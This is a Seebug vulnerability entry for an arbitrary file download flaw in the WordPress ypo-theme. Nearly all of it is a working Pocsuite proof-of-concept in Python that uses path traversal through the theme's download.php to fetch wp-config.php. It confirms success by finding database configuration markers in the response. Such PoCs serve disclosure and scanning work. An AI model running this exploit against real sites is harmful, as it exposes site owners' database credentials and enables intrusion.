WordPress theme ypo-theme Arbitrary File Download Vulnerability

2016-08-09T00:00:00
ID SSV:92262
Type seebug
Reporter cdxy
Modified 2016-08-09T00:00:00

Description

No description provided by source.

                                                #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
class TestPOC(POCBase):
    """Pocsuite PoC for SSV-92262.

    Sends a single GET to the ypo-theme ``download.php`` endpoint and reports
    the target as vulnerable only when the response body carries two markers
    that are characteristic of a WordPress ``wp-config.php`` file.
    """
    vulID = '92262'  # ssvid
    version = '1.0'
    author = ['cdxy']
    vulDate = '2016-08-09'
    createDate = '2016-08-11'
    updateDate = '2016-08-11'
    references = ['https://www.seebug.org/vuldb/ssvid-92262']
    name = 'WordPress theme ypo-theme Arbitrary File Download Vulnerability'
    appPowerLink = 'wordpress.org'
    appName = 'Wordpress'
    appVersion = 'ALL'
    vulType = 'File Download'
    desc = '''
    WordPress theme ypo-theme Arbitrary File Download Vulnerability
    '''

    def _attack(self):
        """Attack mode simply delegates to the verification request."""
        return self._verify()

    def _verify(self):
        """Request the probe path below the target URL and interpret the reply.

        Returns the ``Output`` produced by ``parse_verify``.
        """
        probe_path = "/wp-content/themes/ypo-theme/download.php?download=../../../../wp-config.php"
        base_url = self.url.rstrip('/')
        response = req.get(base_url + probe_path)
        return self.parse_verify(response)

    def parse_verify(self, res):
        """Turn an HTTP response into a pocsuite ``Output``.

        Args:
            res: the response object returned by ``req.get``; ``content`` and
                ``url`` are the only attributes read.

        Returns:
            ``Output`` marked successful (with ``VerifyInfo.URL``) when both
            markers are present in the body, otherwise marked failed.
        """
        output = Output(self)
        body = res.content
        # Both markers are required; a lone "define('DB_NAME'" or a generic
        # WordPress page alone does not count as a finding.
        markers = ("define('DB_NAME'", "@package WordPress")
        if all(marker in body for marker in markers):
            output.success({'VerifyInfo': {'URL': res.url}})
        else:
            output.fail('No vulnerability found.')
        return output
register(TestPOC)  # hand the PoC class to pocsuite via its register() hook